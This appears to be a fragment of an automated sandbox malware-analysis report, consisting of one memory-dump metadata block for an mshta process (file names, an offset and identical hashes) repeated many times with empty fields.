                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000003.12474941730.0000000006CC0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_3_6cc0000_mshta.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction ID: 0f303652dde06c9232f09c5bc9ff3f89de88e9ac0b0d78e01918fa07da366b32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa3b6728a91baa9aeadb2b3655b8ac3034cb4dbee9eb534b5880aa51bfbefc57
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                        Memory Dump Source
